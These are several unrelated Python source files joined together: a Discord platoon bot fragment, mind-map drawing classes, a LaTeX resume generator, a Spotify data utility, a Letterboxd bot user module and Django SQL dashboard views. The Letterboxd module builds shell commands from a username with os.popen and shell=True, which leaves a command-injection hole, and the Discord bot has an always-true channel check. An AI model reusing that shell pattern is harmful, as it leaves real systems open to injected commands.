await message.channel.send("you cant join because a platoon is full")
elif party_status3:
if langmode3 == 0:
await message.channel.send("小隊が存在しません。/hmakeで小隊を作成してください")
elif langmode3 == 1:
await message.channel.send("platoon doesnt exist. please make a platoon before")
if message.content == "/hleave":
if check_user_exist() == False:
if langmode3 == 0:
await message.channel.send("あなたは小隊に参加していません")
elif langmode3 == 1:
await message.channel.send("you arent join a platoon")
else:
if party_status3 == False and party_member3 > 1:
party_member3 -= 1
if langmode3 == 0:
await message.channel.send(str(message.author)+"さんが小隊を退出しました ["+str(party_member3)+"/5]")
elif langmode3 == 1:
await message.channel.send(str(message.author)+" leave a party ["+str(party_member3)+"/5]")
leave_user = str(message.author)
with open("party3.txt","r") as f:
fileText = f.read()
after = fileText.replace(leave_user,"")
with open("party3.txt","w") as f:
f.write(after)
elif party_status3 == False and party_member3 <= 1:
if langmode3 == 0:
await message.channel.send("メンバーがいなくなったため解散します")
elif langmode3 == 1:
await message.channel.send("break a platoon because all member missed")
party_status3 = True
elif party_status3:
if langmode3 == 0:
await message.channel.send("小隊が存在しません。/hmakeで小隊を作成してください")
elif langmode3 == 1:
await message.channel.send("platoon doesnt exist. please make a platoon before")
if message.content == "/hstatus":
if party_status3 == False:
f = open("party3.txt","r")
data = f.read()
await message.channel.send(str(make_name)+"\n"+data+"\n["+str(party_member3)+"/5]")
f.close()
elif party_status3:
if langmode3 == 0:
await message.channel.send("小隊が存在しません。/hmakeで小隊を作成してください")
elif langmode3 == 1:
await message.channel.send("platoon doesnt exist. please make a platoon before")
if message.content == "/hbreak":
if check_user_exist():
if party_status3 == False:
if langmode3 == 0:
await message.channel.send("正常に解散されました")
elif langmode3 == 1:
await message.channel.send("break a party successfully")
party_status3 = True
elif party_status3:
if langmode3 == 0:
await message.channel.send("小隊が存在しないため解散できません")
elif langmode3 == 1:
await message.channel.send("cant break a party because party doesnt exist")
else:
if langmode3 == 0:
await message.channel.send("あなたは小隊に参加していないため、小隊を解散することはできません")
elif langmode3 == 1:
await message.channel.send("you cant break a party, because you arent join the party")
make_name3 = make_name
await change_platoon_info()
# 小隊緊急時用コマンド
if message.channel.id == CHANNEL_ID_PARTY_1 or CHANNEL_ID_PARTY_2 or CHANNEL_ID_PARTY_3:
if message.content == "/hclear":
party_status = True
party_status2 = True
party_member3 = True
#小隊情報表示チャンネルの小隊情報表示用メッセージに小隊情報を表示
@client.event
async def change_platoon_info():
channel= client.get_channel(CHANNEL_ID_PARTY_LOBBY)
if party_status == False:
msg= await channel.fetch_message(MSG_ID_1)
await msg.edit(content="Platoon1 : ["+str(party_member)+"/5] "+"name:"+make_name1)
else:
msg= await channel.fetch_message(MSG_ID_1)
await msg.edit(content="Platoon1 : 空")
if party_status2 == False:
msg= await channel.fetch_message(MSG_ID_2)
await msg.edit(content="Platoon2 : ["+str(party_member2)+"/5] "+"name:"+make_name2)
else:
msg= await channel.fetch_message(MSG_ID_2)
await msg.edit(content="Platoon2 : 空")
if party_status3 == False:
msg= await channel.fetch_message(MSG_ID_3)
await msg.edit(content="Platoon3 : ["+str(party_member3)+"/5] "+"name:"+make_name3)
else:
msg= await channel.fetch_message(MSG_ID_3)
await msg.edit(content="Platoon3 : 空")
# Botの起動とDiscordサーバーへの接続
client.run(TOKEN)
|
import os
from twyg.common import createpath
from twyg.config import (Properties, NumberProperty,
EnumProperty, ColorProperty)
from twyg.geom import Vector2
from twyg.geomutils import arcpath
from twyg.tree import Direction, opposite_dir
# TODO util function in common?
def defaults_path(conf):
return os.path.join('connection', conf)
class CurveConnectionDrawer(object):
def __init__(self, config={}):
properties = {
'nodeLineWidthStart': (NumberProperty, {'min': 0.0}),
'nodeLineWidthEnd': (NumberProperty, {'min': 0.0}),
'nodeCx1Factor': (NumberProperty, {}),
'nodeCx2Factor': (NumberProperty, {}),
'nodeCy1Factor': (NumberProperty, {}),
'nodeCy2Factor': (NumberProperty, {})
}
self._props = Properties(properties, defaults_path('curve'), config)
def _eval_func(self, node):
return lambda name: self._props.eval(name, node)
def draw(self, node):
"""
Draw a curved connection between a node and its child nodes.
"""
E = self._eval_func(node)
if node.isleaf():
return
_ctx.autoclosepath(True)
_ctx.stroke(node.connectioncolor)
_ctx.fill(node.connectioncolor)
children = node.children
for child in children:
linewidth = E('nodeLineWidthEnd')
_ctx.strokewidth(linewidth)
direction = child.direction()
opp_direction = opposite_dir(direction)
x1, y1 = node.connection_point(direction)
x2, y2 = child.connection_point(opp_direction)
if direction == Direction.Left:
x2 -= linewidth / 2
elif direction == Direction.Right:
x2 += linewidth / 2
if len(children) == 1:
_ctx.line(x1, y1, x2, y2)
else:
cx1 = (x2 - x1) * E('nodeCx1Factor')
cx2 = (x2 - x1) * E('nodeCx2Factor')
cy1 = (y2 - y1) * E('nodeCy1Factor')
cy2 = (y2 - y1) * E('nodeCy2Factor')
p1x = x1 + cx1
p1y = y1 + cy1
p2x = x2 - cx2
p2y = y2 - cy2
startwidth = E('nodeLineWidthStart') - 1
sw = startwidth / 2.
_ctx.beginpath(x1, y1 - sw)
_ctx.curveto(p1x, p1y, p2x, p2y, x2, y2)
_ctx.curveto(p2x, p2y, p1x, p1y, x1, y1 + sw)
_ctx.endpath()
class JunctionConnectionDrawer(object):
def __init__(self, config={}):
corner_styles = ('square', 'beveled', 'rounded')
junction_styles = ('none', 'square', 'disc', 'diamond')
junction_sign = ('none', 'plus', 'minus')
properties = {
'lineWidth': (NumberProperty, {'min': 0.0}),
'junctionXFactor': (NumberProperty, {}),
'cornerStyle': (EnumProperty, {'values': corner_styles}),
'cornerRadius': (NumberProperty, {'min': 0.0}),
'cornerPad': (NumberProperty, {'min': 0.0}),
'junctionStyle': (EnumProperty,{'values': junction_styles}),
'junctionRadius': (NumberProperty, {'min': 0.0}),
'junctionFillColor': (ColorProperty, {}),
'junctionStrokeWidth': (NumberProperty, {'min': 0.0}),
'junctionStrokeColor': (ColorProperty, {}),
'junctionSign': (EnumProperty,
{'values': junction_sign}),
'junctionSignSize': (NumberProperty, {'min': 0.0}),
'junctionSignStrokeWidth': (NumberProperty, {'min': 0.0}),
'junctionSignColor': (ColorProperty, {})
}
self._props = Properties(properties, defaults_path('junction'),
config)
def _eval_func(self, node):
return lambda name: self._props.eval(name, node)
def draw(self, node):
if node.isroot():
self._draw(node, Direction.Left)
self._draw(node, Direction.Right)
else:
self._draw(node)
def _draw(self, node, direction=None):
"""
Draw a curved connection between a node and its child nodes.
"""
E = self._eval_func(node)
children = node.getchildren(direction)
if not children:
return
linewidth = E('lineWidth')
_ctx.autoclosepath(True)
_ctx.stroke(node.connectioncolor)
_ctx.fill(node.connectioncolor)
_ctx.strokewidth(linewidth)
firstchild = children[0]
lastchild = children[-1]
direction = firstchild.direction()
opp_direction = opposite_dir(direction)
x1, y1 = node.connection_point(direction)
xfirst, yfirst = firstchild.connection_point(opp_direction)
# Special case: draw straight line if there's only one child
if len(children) == 1:
_ctx.line(x1, y1, xfirst, yfirst)
return
# Calculate junction point position
jx = x1 + (xfirst - x1) * E('junctionXFactor')
jy = y1
# Draw line from parent node to junction point
_ctx.line(x1, y1, jx, jy)
# Limit first & last corner radius to the available area
ylast = lastchild.connection_point(opp_direction)[1]
ysecond = children[1].connection_point(opp_direction)[1]
ypenultimate = children[-2].connection_point(opp_direction)[1]
# Starting corner radius
cornerPad = E('cornerPad')
r = min(E('cornerRadius'), abs(jx - xfirst) - cornerPad)
r = max(r, 0)
# Adjusted first (top) corner radius
r1 = min(r, abs(yfirst - jy) - cornerPad)
r1 = max(r1, 0)
if ysecond < jy:
r1 = min(r, abs(yfirst - ysecond) - cornerPad)
r1 = max(r1, 0)
# Adjusted last (bottom) corner radius
r2 = min(r, abs(ylast - jy) - cornerPad)
r2 = max(r2, 0)
if ypenultimate > jy:
r2 = min(r, abs(ylast - ypenultimate) - cornerPad)
r2 = max(r2, 0)
# Draw main branch as a single path to ensure line continuity
p1 = Vector2(jx, yfirst + r1)
p2 = Vector2(jx, ylast - r2)
segments = [[p1, p2]]
corner_style = E('cornerStyle')
for i, child in enumerate(children):
direction = child.direction()
opp_direction = opposite_dir(direction)
x2, y2 = child.connection_point(opp_direction)
if direction == Direction.Left:
x2 -= linewidth / 2
elif direction == Direction.Right:
x2 += linewidth / 2
# Draw corners
if direction == Direction.Left:
a1 = 90
da = -90
dx1 = r1 * 2
dx2 = r2 * 2
else:
a1 = da = 90
dx1 = dx2 = 0
x1 = jx
if child is firstchild:
x1 += -r1 if direction == Direction.Left else r1
if (corner_style == 'square' or abs(y2 - jy) < .001):
p1 = Vector2(jx, y2)
p2 = Vector2(jx, y2 + r1)
segments.insert(0, [p1, p2])
p1 = Vector2(x1, y2)
p2 = Vector2(jx, y2)
segments.insert(0, [p1, p2])
elif corner_style == 'beveled':
p1 = Vector2(x1, y2)
p2 = Vector2(jx, y2 + r1)
segments.insert(0, [p1, p2])
elif corner_style == 'rounded':
arc = arcpath(jx - dx1, y2, r1 * 2, r1 * 2, a1, da)
segments = arc + segments
p1 = Vector2(x2, y2)
p2 = Vector2(x1, y2)
segments.insert(0, [p1, p2])
elif child is lastchild:
x1 += -r2 if direction == Direction.Left else r2
if (corner_style == 'square' or abs(y2 - jy) < .001):
p1 = Vector2(jx, y2 - r2)
p2 = Vector2(jx, y2)
segments.append([p1, p2])
p1 = Vector2(jx, y2)
p2 = Vector2(x1, y2)
segments.append([p1, p2])
elif corner_style == 'beveled':
p1 = Vector2(jx, y2 - r2)
p2 = Vector2(x1, y2)
segments.append([p1, p2])
elif corner_style == 'rounded':
arc = arcpath(jx - dx2, y2 - r2 * 2, r2 * 2, r2 * 2,
a1 + da, da)
segments = segments + arc
p1 = Vector2(x1, y2)
p2 = Vector2(x2, y2)
segments.append([p1, p2])
else:
_ctx.line(x1, y2, x2, y2)
# Draw main branch path
_ctx.nofill()
path = createpath(_ctx, segments, close=False)
_ctx.drawpath(path)
# Draw junction point
style = E('junctionStyle')
if style == 'none':
return
r = E('junctionRadius')
r2 = r / 2.
_ctx.fill(E('junctionFillColor'))
_ctx.stroke(E('junctionStrokeColor'))
_ctx.strokewidth(E('junctionStrokeWidth'))
if style == 'square':
_ctx.rect(jx - r2, jy - r2, r, r)
elif style == 'disc':
_ctx.oval(jx - r2, jy - r2, r, r)
elif style == 'diamond':
_ctx.beginpath(jx, jy - r2)
_ctx.lineto(jx + r2, jy)
_ctx.lineto(jx, jy + r2)
_ctx.lineto(jx - r2, jy)
_ctx.lineto(jx, jy - r2)
_ctx.endpath()
# Draw junction sign
sign = E('junctionSign')
if sign == 'none':
return
_ctx.stroke(E('junctionSignColor'))
d = E('junctionSignSize') / 2.
_ctx.strokewidth(E('junctionSignStrokeWidth'))
if sign in ('minus', 'plus'):
_ctx.line(jx - d, jy, jx + d, jy)
if sign == 'plus':
_ctx.line(jx, jy - d, jx, jy + d)
_conndrawer_map = {
'curve': CurveConnectionDrawer,
'junction': JunctionConnectionDrawer
}
def conndrawer_by_name(name):
if name in _conndrawer_map:
return _conndrawer_map[name]
else:
raise ValueError, 'Unrecognized connection drawer name: %s' % name
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 15 18:56:14 2016
@author: mark
"""
from api import *
file_writer = None
def write(text, process_text=True):
"""
writes text into the document in a format to be decided later
"""
if process_text:
text = text.replace('%','\%')
text = text.replace('&','\&')
text = text.replace('$','\$')
text = text.replace('\\$','$')
file_writer.write(text)
def writeobj(obj, pref):
"""
this method outputs text for a Category, Task, or Point using recursive
algorythem and checking to see if the document's desired_emphasis allows
for the item to be printed.
obj = an item of Category, Task, or Point class
pref = desired emphasis of the document
"""
if pref.judge(obj):
if isinstance(obj,Point):
return r"\item[] " + obj.text
elif isinstance(obj,Task):
string = r"\headercondensed{%s}{%s}{%s}" % (obj.title,obj.entity,obj.dates)
if obj.points != []:
points_string = ''
for point in obj.points:
points_string += writeobj(point,pref)
if points_string: # valid points are identified
string += r"\begin{itemize}"
string += points_string
string += r"""\end{itemize}
\vspace{0.5em}"""
elif isinstance(obj,Category):
string = r"\subsection*{%s}" % (obj.name)
if obj.tasks != [] or obj.points != []:
string += r"\begin{indentsection}{\parindent} \parskip=0.0em"
if obj.tasks != []:
for task in obj.tasks:
string += writeobj(task,pref)
if obj.points != []:
points_string = ''
for point in obj.points:
points_string += writeobj(point,pref)
if points_string: # valid points are identified
string += r"\begin{itemize}"
string += points_string
string += r"\end{itemize}"
string+=r"""\end{indentsection}
\vspace{-1em}"""
else:
raise Exception("the class passed to writeobj is not supported. the passed class is " + str(type(obj)))
return string
return ''
def output(text, tag_arg=''):
"""
outputs the text in the specified format if the tag
matches the resume_tags.
tag is either '' (always matches), a string,
or a list of strings of acceptable tags.
this method can be edited to output to specific files later
"""
if tag_arg=='' or check_match(tag_arg):
write(text)
#checks for no mistypes
ensure_possible_tags(tag_arg)
def ensure_possible_tags(tag_arg):
"""
checks to make sure tag_arg is in the possible_tags category.
throws an error if it is not.
tag_arg - a string or list of strings
"""
if isinstance(tag_arg, str):
if possible_tags.count(tag_arg)==0:
raise Exception("Tag %s is not found in possible tags" %(tag_arg))
elif isinstance(tag_arg,list):
for tag_name in tag_arg:
ensure_possible_tags(tag_name)
def makeheader():
"""
Returns the header information for the Latex document. Currently this just
returns the header information. In the future this may have some arguments
for introducing extra Latex packages
"""
return r"""% resume.tex
% vim:set ft=tex spell:
\documentclass[10pt,letterpaper]{article}
\usepackage[letterpaper,margin=0.75in]{geometry}
\usepackage[utf8]{inputenc}
\usepackage[T1]{fontenc}
\usepackage{mdwlist}
\usepackage{textcomp}
\usepackage{tgpagella}
\usepackage{tabularx}
\pagestyle{empty}
\setlength{\tabcolsep}{0em}
\usepackage[version=4]{mhchem}
\usepackage[backend=biber,style=authoryear, bibstyle=authoryear, sorting = ynt]{biblatex}
\addbibresource{resume.bib}
% table spacing
\usepackage{enumitem}
\setlist{topsep=0.0em,itemsep=0.2em,parsep=0.0em}
% proper links
\usepackage[svgnames]{xcolor}
\usepackage[colorlinks]{hyperref}
\hypersetup{citecolor=DeepPink4}
\hypersetup{linkcolor=DarkRed}
\hypersetup{urlcolor=DarkBlue}
\usepackage{cleveref}
% indentsection style, used for sections that aren't already in lists
% that need indentation to the level of all text in the document
\newenvironment{indentsection}[1]%
{\begin{list}{}%
{\setlength{\leftmargin}{#1}}%
\item[]%
}
{\end{list}}
% possibly not used, remove
\newenvironment{projectsList}[1]%
{\subsection*{#1}
\begin{itemize}
\parskip=0.1em
}
{\end{itemize}}
% possibly not used, remove
\newcommand{\inputsec}[1]
{
\vspace{-1.5em}
\input{#1}
}
% format two pieces of text, one left aligned and one right aligned
\newcommand{\headerrow}[2]
{\begin{tabular*}{\linewidth}{l@{\extracolsep{\fill}}r}
#1 &
#2 \\
\end{tabular*}
}
% format three pieces of text, one left aligned, one center, and one right aligned
\newcommand{\headercondensed}[3]
{\begin{tabularx}{\linewidth}{lX<{\raggedleft}@{\hspace{2em}}p{4.5em}<{\raggedleft}}
\textbf{#1} & #2 & \emph{#3}
\end{tabularx}
}
% format intro with project, position, company, date
\newcommand{\itemintro}[4]
{
\headerrow
{\textbf{#1}}
{\textbf{#3}}
\\
\headerrow
{\emph{#2}}
{\emph{#4}}
}
% make "C++" look pretty when used in text by touching up the plus signs
\newcommand{\CPP}
{C\nolinebreak[4]\hspace{-.05em}\raisebox{.22ex}{\footnotesize\bf ++}}
"""
def begindocument():
return r"""\begin{document}
"""
def enddocument():
return r"""\end{document}
"""
|
import spotipy.util as util
import pandas as pd
import spotipy
from datetime import datetime
class SpotifyUtil:
'''
Utility class for accessing Spotify API
'''
query_dict = {
'current_user_recently_played': 'parse_songplays',
'current_user_top_artists': 'parse_top_artists',
'current_user_top_tracks': 'parse_top_tracks'
}
def __init__(self, username, client_id, client_secret, redirect_uri):
self.username = username
self.client_id = client_id
self.client_secret = client_secret
self.redirect_uri = redirect_uri
def get_spotify_data(self, scope, query, limit=50):
'''
Retrieves data from Spotify
'''
token = self.get_token(scope=scope)
spotify = self.get_connection(token=token)
json = getattr(spotify, query)(limit=limit)
self.df = getattr(self, self.query_dict[query])(data=json, spotify=spotify)
return self.df
def get_token(self, scope):
'''
Obtains the token for user authorization
'''
token = util.prompt_for_user_token(username=self.username,
scope=scope,
client_id=self.client_id,
client_secret=self.client_secret,
redirect_uri=self.redirect_uri)
return token
def get_connection(self, token):
'''
Sets up the Spotify Connection
'''
spotify = spotipy.Spotify(auth=token)
return spotify
def parse_json(self, data, columns, *args, **kwargs):
'''
Parses response data in JSON format
'''
if not (kwargs.get('result_key')==None):
data = data[kwargs['result_key']]
df = pd.json_normalize(data).reset_index()
df['index'] = df['index'] + 1
df = df[columns.keys()].rename(columns=columns)
return df
def parse_primary_other(self, parse_list=[]):
'''
Parses primary and other values for lists
'''
parse_list = parse_list.copy()
try:
primary = parse_list.pop(0)
except IndexError:
primary = None
others = ", ".join(parse_list)
return primary, others
def parse_songplays(self, data, spotify, columns=None):
'''
Parses songplays data of user
'''
if columns is None:
columns = {
'index': 'songplays_id',
'track.id': 'track_id',
'track.name': 'track_name',
'track.artists': 'artists',
'track.duration_ms' : 'track_duration',
'track.explicit': 'track_is_explicit',
'track.popularity': 'track_popularity',
'played_at': 'track_played_at',
'track.album.id': 'album_id',
'track.album.name': 'album_name',
'track.album.release_date': 'album_release_year',
'track.album.type': 'album_type'
}
songplays = self.parse_json(data=data, columns=columns, result_key='items')
# Parse artists
def parse_artist(artists):
# parse primary and other artists
artist_name, artist_name_others = self.parse_primary_other([artist['name'] for artist in artists])
artist_id, artist_id_others = self.parse_primary_other([artist['id'] for artist in artists])
return artist_name, artist_name_others, artist_id, artist_id_others
(songplays['artist_name'], songplays['artist_name_others'],
songplays['artist_id'], songplays['artist_id_others']) = zip(*songplays['artists'].apply(parse_artist))
# Get release year
def parse_year(album_release_year):
try:
year = datetime.strptime(album_release_year, '%Y-%m-%d').year
except (ValueError, NameError):
year = datetime.strptime(album_release_year, '%Y').year
return year
songplays['album_release_year'] = songplays['album_release_year'].apply(lambda x: parse_year(x))
# Convert timestamp
try:
songplays['track_played_at'] = songplays['track_played_at'] \
.apply(lambda x: pd.Timestamp(x).strftime('%Y-%m-%d %H:%M:%S'))
except KeyError:
pass
#Convert track duration
songplays['track_duration'] = songplays['track_duration'].apply(lambda x: x/60000)
# Get features
def get_features(key, method, df, columns, result_key=None):
features = getattr(spotify, method)(df[key].values.tolist())
features_df = self.parse_json(data=features, columns=columns, result_key=result_key)
features_df.drop_duplicates(subset=key, inplace=True)
df = df.merge(features_df, how='left', on=key)
return df
# Get track features
track_features_columns = {
'id': 'track_id',
'danceability': 'track_danceability',
'energy': 'track_energy',
'key': 'track_key',
'loudness': 'track_loudness',
'mode': 'track_mode',
'speechiness': 'track_speechiness',
'acousticness': 'track_acousticness',
'instrumentalness': 'track_instrumentalness',
'liveness': 'track_liveness',
'valence': 'track_valence'
}
songplays = get_features(key='track_id',
method='audio_features',
df=songplays,
columns=track_features_columns)
# Get artist features
artist_features_columns = {
'id': 'artist_id',
'genres': 'artist_genres',
'popularity': 'artist_popularity',
'followers.total': 'artist_followers'
}
songplays = get_features(key='artist_id',
method='artists',
df=songplays,
columns=artist_features_columns,
result_key='artists')
# Parse genres
(songplays['artist_genre'],
songplays['artist_genre_others']) = zip(*songplays['artist_genres'].apply(self.parse_primary_other))
songplays.drop(columns=['artist_genres', 'artists'], axis=1, inplace=True)
return songplays
def parse_top_artists(self, data, spotify):
'''
Parses top artists of user
'''
columns = {
'index': 'artist_rank',
'id': 'artist_id',
'name': 'artist_name',
'genres': 'artist_genres',
'popularity': 'artist_popularity',
'followers.total': 'artist_followers'
}
top_artists = self.parse_json(data=data, columns=columns, result_key='items')
# Parse genres
(top_artists['artist_genre'],
top_artists['artist_genre_others']) = zip(*top_artists['artist_genres'].apply(self.parse_primary_other))
top_artists.drop(columns=['artist_genres'], axis=1, inplace=True)
return top_artists
def parse_top_tracks(self, data, spotify):
'''
Parses top tracks of user
'''
columns = {
'index': 'track_rank',
'id': 'track_id',
'name': 'track_name',
'artists': 'artists',
'duration_ms' : 'track_duration',
'explicit': 'track_is_explicit',
'popularity': 'track_popularity',
'album.id': 'album_id',
'album.name': 'album_name',
'album.release_date': 'album_release_year',
'album.type': 'album_type'
}
top_tracks = self.parse_songplays(data=data, spotify=spotify, columns=columns)
return top_tracks |
<gh_stars>0
import os
import subprocess
from api import api_call, post_call
from config import SETTINGS
from helpers import create_embed, LetterboxdError
async def user_embed(username):
username = username.lower()
url = 'https://letterboxd.com/{}'.format(username)
lbxd_id = __check_if_fixed_search(username)
if not lbxd_id:
lbxd_id = await __search_profile(username)
member_json = await __get_userjson(lbxd_id)
display_name, avatar_url, description = await __get_infos(member_json, lbxd_id)
fav_text, fav_posters_link = __get_favs(member_json)
description += fav_text
return create_embed(display_name, url, description, avatar_url)
async def user_details(username):
username = username.lower()
lbxd_id = __check_if_fixed_search(username)
if not lbxd_id:
lbxd_id = await __search_profile(username)
member_json = await __get_userjson(lbxd_id)
display_name, avatar_url, __ = await __get_infos(member_json, lbxd_id, False)
return username, display_name, lbxd_id, avatar_url
def __check_if_fixed_search(username):
for fixed_username, lbxd_id in SETTINGS['fixed_user_search'].items():
if fixed_username.lower() == username:
return lbxd_id
return ''
async def __search_profile(username):
params = {
'input': username,
'include': 'MemberSearchItem',
'perPage': '100'
}
while True:
response = await api_call('search', params)
if not response['items']:
break
for result in response['items']:
if result['member']['username'].lower() == username:
return result['member']['id']
if response.get('next'):
params['cursor'] = response['next']
else:
break
raise LetterboxdError('The user **' + username + '** wasn\'t found.')
async def __get_userjson(lbxd_id):
member_response = await api_call('member/{}'.format(lbxd_id))
if member_response == '':
raise LetterboxdError(
'The user wasn\'t found. ' +
'They may have refused to be reachable via the API.')
return member_response
async def __get_infos(member_json, lbxd_id, with_stats=True):
print(member_json['id'])
display_name = member_json['displayName']
avatar_url = member_json['avatar']['sizes'][-1]['url']
description = '**'
if member_json.get('location'):
description += member_json['location'] + '** -- **'
if with_stats:
stats_json = await api_call('member/{}/statistics'.format(lbxd_id))
description += str(stats_json['counts']['watches']) + ' films**\n'
return display_name, avatar_url, description
def __get_favs(member_json):
description = ''
fav_posters_link = list()
for fav_film in member_json['favoriteFilms']:
fav_name = fav_film['name']
if fav_film.get('poster'):
for poster in fav_film['poster']['sizes']:
if 150 < poster['width'] < 250:
fav_posters_link.append(poster['url'])
if fav_film.get('releaseYear'):
fav_name += ' (' + str(fav_film['releaseYear']) + ')'
for link in fav_film['links']:
if link['type'] == 'letterboxd':
fav_url = link['url']
description += '[{0}]({1})\n'.format(fav_name, fav_url)
return description, fav_posters_link
async def __upload_fav_posters(username, fav_posters_link):
# Download posters
if not os.path.exists(username):
os.popen('mkdir ' + username)
img_cmd = 'convert '
for index, fav_poster in enumerate(fav_posters_link):
img_data = await api_call(fav_poster, None, False, False)
temp_fav = '{0}/fav{1}.jpg'.format(username, index)
img_cmd += temp_fav + ' '
with open(temp_fav, 'wb') as handler:
handler.write(img_data)
# Upload to Cloudinary
img_cmd += '+append {}/fav.jpg'.format(username)
subprocess.call(img_cmd, shell=True)
with open('{}/fav.jpg'.format(username), 'rb') as pic:
bin_pic = pic.read()
os.popen('rm -r ' + username)
upload_url = 'https://api.cloudinary.com/v1_1/'
upload_url += SETTINGS['cloudinary']['cloud_name'] + '/image/upload'
params = {'file': bin_pic,
'upload_preset': SETTINGS['cloudinary']['preset']}
result = await post_call(upload_url, params)
return result['url']
|
import csv
import hashlib
import re
import time
from io import StringIO
from urllib.parse import urlencode
from django.conf import settings
from django.contrib.auth.decorators import permission_required
from django.db import connections
from django.db.utils import ProgrammingError
from django.forms import CharField, ModelForm, Textarea
from django.http.response import (
HttpResponseForbidden,
HttpResponseRedirect,
StreamingHttpResponse,
)
from django.shortcuts import get_object_or_404, render
from .models import Dashboard
from .utils import (
check_for_base64_upgrade,
displayable_rows,
extract_named_parameters,
sign_sql,
unsign_sql,
)
# https://github.com/simonw/django-sql-dashboard/issues/58
MAX_REDIRECT_LENGTH = 1800
class SaveDashboardForm(ModelForm):
slug = CharField(required=False, label="URL", help_text='For example "daily-stats"')
class Meta:
model = Dashboard
fields = (
"title",
"slug",
"description",
"view_policy",
"view_group",
"edit_policy",
"edit_group",
)
widgets = {
"description": Textarea(
attrs={
"placeholder": "Optional description, shown at the top of the dashboard page"
}
)
}
@permission_required("django_sql_dashboard.execute_sql")
def dashboard_index(request):
sql_queries = []
too_long_so_use_post = False
save_form = SaveDashboardForm(prefix="_save")
if request.method == "POST":
# Is this an export?
if any(
k for k in request.POST.keys() if k.startswith("export_")
) and request.user.has_perm("django_sql_dashboard.execute_sql"):
if not getattr(settings, "DASHBOARD_ENABLE_FULL_EXPORT", None):
return HttpResponseForbidden("The export feature is not enabled")
return export_sql_results(request)
sqls = [sql for sql in request.POST.getlist("sql") if sql.strip()]
saving = False
# How about a save?
if request.POST.get("_save-slug"):
save_form = SaveDashboardForm(request.POST, prefix="_save")
saving = True
if save_form.is_valid():
dashboard = save_form.save(commit=False)
dashboard.owned_by = request.user
dashboard.save()
for sql in sqls:
dashboard.queries.create(sql=sql)
return HttpResponseRedirect(dashboard.get_absolute_url())
# Convert ?sql= into signed values and redirect as GET
other_pairs = [
(key, value)
for key, value in request.POST.items()
if key not in ("sql", "csrfmiddlewaretoken")
and not key.startswith("_save-")
]
signed_sqls = [sign_sql(sql) for sql in sqls if sql.strip()]
params = {
"sql": signed_sqls,
}
params.update(other_pairs)
redirect_path = request.path + "?" + urlencode(params, doseq=True)
# Is this short enough for us to redirect?
too_long_so_use_post = len(redirect_path) > MAX_REDIRECT_LENGTH
if not saving and not too_long_so_use_post:
return HttpResponseRedirect(redirect_path)
else:
sql_queries = sqls
unverified_sql_queries = []
for signed_sql in request.GET.getlist("sql"):
sql, signature_verified = unsign_sql(signed_sql)
if signature_verified:
sql_queries.append(sql)
else:
unverified_sql_queries.append(sql)
if getattr(settings, "DASHBOARD_UPGRADE_OLD_BASE64_LINKS", None):
redirect_querystring = check_for_base64_upgrade(sql_queries)
if redirect_querystring:
return HttpResponseRedirect(request.path + redirect_querystring)
return _dashboard_index(
request,
sql_queries,
unverified_sql_queries=unverified_sql_queries,
too_long_so_use_post=too_long_so_use_post,
extra_context={"save_form": save_form},
)
def _dashboard_index(
request,
sql_queries,
unverified_sql_queries=None,
title=None,
description=None,
dashboard=None,
too_long_so_use_post=False,
template="django_sql_dashboard/dashboard.html",
extra_context=None,
):
query_results = []
alias = getattr(settings, "DASHBOARD_DB_ALIAS", "dashboard")
row_limit = getattr(settings, "DASHBOARD_ROW_LIMIT", None) or 100
connection = connections[alias]
with connection.cursor() as tables_cursor:
tables_cursor.execute(
"""
with visible_tables as (
select table_name
from information_schema.tables
where table_schema = 'public'
order by table_name
)
select
information_schema.columns.table_name,
string_agg(column_name, ', ' order by ordinal_position) as columns
from
information_schema.columns
join
visible_tables on
information_schema.columns.table_name = visible_tables.table_name
where
information_schema.columns.table_schema = 'public'
group by
information_schema.columns.table_name
order by
information_schema.columns.table_name
"""
)
available_tables = [
{"name": t[0], "columns": t[1]} for t in tables_cursor.fetchall()
]
parameters = []
sql_query_parameter_errors = []
for sql in sql_queries:
try:
extracted = extract_named_parameters(sql)
for p in extracted:
if p not in parameters:
parameters.append(p)
sql_query_parameter_errors.append(False)
except ValueError as e:
if "%" in sql:
sql_query_parameter_errors.append(
r"Invalid query - try escaping single '%' as double '%%'"
)
else:
sql_query_parameter_errors.append(str(e))
parameter_values = {
parameter: request.POST.get(parameter, request.GET.get(parameter, ""))
for parameter in parameters
if parameter != "sql"
}
extra_qs = "&{}".format(urlencode(parameter_values)) if parameter_values else ""
results_index = -1
if sql_queries:
for sql, parameter_error in zip(sql_queries, sql_query_parameter_errors):
results_index += 1
sql = sql.strip().rstrip(";")
base_error_result = {
"index": str(results_index),
"sql": sql,
"textarea_rows": min(5, len(sql.split("\n"))),
"rows": [],
"row_lists": [],
"description": [],
"columns": [],
"column_details": [],
"truncated": False,
"extra_qs": extra_qs,
"error": None,
"templates": ["django_sql_dashboard/widgets/error.html"],
}
if parameter_error:
query_results.append(
dict(
base_error_result,
error=parameter_error,
)
)
continue
if ";" in sql:
query_results.append(
dict(base_error_result, error="';' not allowed in SQL queries")
)
continue
with connection.cursor() as cursor:
duration_ms = None
try:
cursor.execute("BEGIN;")
start = time.perf_counter()
# Running a SELECT prevents future SET TRANSACTION READ WRITE:
cursor.execute("SELECT 1;")
cursor.fetchall()
cursor.execute(sql, parameter_values)
try:
rows = list(cursor.fetchmany(row_limit + 1))
except ProgrammingError as e:
rows = [{"statusmessage": str(cursor.statusmessage)}]
duration_ms = (time.perf_counter() - start) * 1000.0
except Exception as e:
query_results.append(dict(base_error_result, error=str(e)))
else:
templates = ["django_sql_dashboard/widgets/default.html"]
columns = [c.name for c in cursor.description]
template_name = ("-".join(sorted(columns))) + ".html"
if len(template_name) < 255:
templates.insert(
0,
"django_sql_dashboard/widgets/" + template_name,
)
display_rows = displayable_rows(rows[:row_limit])
column_details = [
{"name": column, "is_unambiguous": columns.count(column) == 1}
for column in columns
]
query_results.append(
{
"index": str(results_index),
"sql": sql,
"textarea_rows": len(sql.split("\n")),
"rows": [dict(zip(columns, row)) for row in display_rows],
"row_lists": display_rows,
"description": cursor.description,
"columns": columns,
"column_details": column_details,
"truncated": len(rows) == row_limit + 1,
"extra_qs": extra_qs,
"duration_ms": duration_ms,
"templates": templates,
}
)
finally:
cursor.execute("ROLLBACK;")
# Page title, composed of truncated SQL queries
html_title = "SQL Dashboard"
if sql_queries:
html_title = "SQL: " + " [,] ".join(sql_queries)
if dashboard and dashboard.title:
html_title = dashboard.title
# Add named parameter values, if any exist
